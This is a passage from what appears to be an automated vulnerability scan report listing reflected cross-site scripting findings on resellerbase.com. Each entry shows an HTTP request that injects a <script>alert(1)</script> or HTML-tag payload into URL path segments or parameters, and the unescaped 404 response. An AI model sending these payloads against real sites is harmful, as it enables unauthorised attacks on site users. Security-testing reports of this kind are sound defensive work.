GET /detail/4/themes/kosmos/images/rating/4half.gif30ae7<script>alert(1)</script>d3b841b60e7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/4half.gif30ae7<script>alert(1)</script>d3b841b60e7 was not found on this server.</p>
...[SNIP]...

2.2775. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8c119<script>alert(1)</script>0f6e82a1262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/rating/4half.gif?8c119<script>alert(1)</script>0f6e82a1262=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/4half.gif?8c119<script>alert(1)</script>0f6e82a1262=1 was not found on this server.</p>
...[SNIP]...

2.2776. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b545f<script>alert(1)</script>adb4ba19a18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb545f<script>alert(1)</script>adb4ba19a18/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb545f<script>alert(1)</script>adb4ba19a18/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2777. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bfbd7<script>alert(1)</script>e8e34976d17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4bfbd7<script>alert(1)</script>e8e34976d17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4bfbd7<script>alert(1)</script>e8e34976d17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2778. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fbda1<script>alert(1)</script>d2791a0f523 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themesfbda1<script>alert(1)</script>d2791a0f523/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themesfbda1<script>alert(1)</script>d2791a0f523/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2779. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 28f9f<script>alert(1)</script>5eef107f536 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos28f9f<script>alert(1)</script>5eef107f536/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos28f9f<script>alert(1)</script>5eef107f536/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2780. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cb3e9<script>alert(1)</script>0fbf8e6b44c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/imagescb3e9<script>alert(1)</script>0fbf8e6b44c/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/imagescb3e9<script>alert(1)</script>0fbf8e6b44c/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2781. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cfe88<script>alert(1)</script>2f4252ec528 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/ratingcfe88<script>alert(1)</script>2f4252ec528/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/ratingcfe88<script>alert(1)</script>2f4252ec528/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2782. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c3c1c<script>alert(1)</script>3dfba1ae992 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/rating/search.phpc3c1c<script>alert(1)</script>3dfba1ae992?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/search.phpc3c1c<script>alert(1)</script>3dfba1ae992?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2783. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a81e0<a>80f15a1e82 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searcha81e0<a>80f15a1e82&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searcha81e0<a>80f15a1e82&opt=2 was not found on this server.</p>
...[SNIP]...

2.2784. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e8246<a>b113fc603c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/images/rating/search.php?keyword=search...e8246<a>b113fc603c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/search.php?keyword=search...e8246<a>b113fc603c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2785. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3de3d<script>alert(1)</script>41defd433 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&3de3d<script>alert(1)</script>41defd433=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&3de3d<script>alert(1)</script>41defd433=1 was not found on this server.</p>
...[SNIP]...

2.2786. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ec806<a>8aa51d7789 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ec806<a>8aa51d7789 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ec806<a>8aa51d7789 was not found on this server.</p>
...[SNIP]...

2.2787. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 131fa<script>alert(1)</script>d6b1098179a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail131fa<script>alert(1)</script>d6b1098179a/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail131fa<script>alert(1)</script>d6b1098179a/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2788. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d18a<script>alert(1)</script>1c3bf06188a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/49d18a<script>alert(1)</script>1c3bf06188a/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/49d18a<script>alert(1)</script>1c3bf06188a/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2789. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9a914<script>alert(1)</script>1d9dc976fa6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes9a914<script>alert(1)</script>1d9dc976fa6/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes9a914<script>alert(1)</script>1d9dc976fa6/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2790. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92ea4<script>alert(1)</script>e2de87a845e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos92ea4<script>alert(1)</script>e2de87a845e/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos92ea4<script>alert(1)</script>e2de87a845e/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2791. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5fd5b<script>alert(1)</script>d11b328e6b9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images5fd5b<script>alert(1)</script>d11b328e6b9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images5fd5b<script>alert(1)</script>d11b328e6b9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2792. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
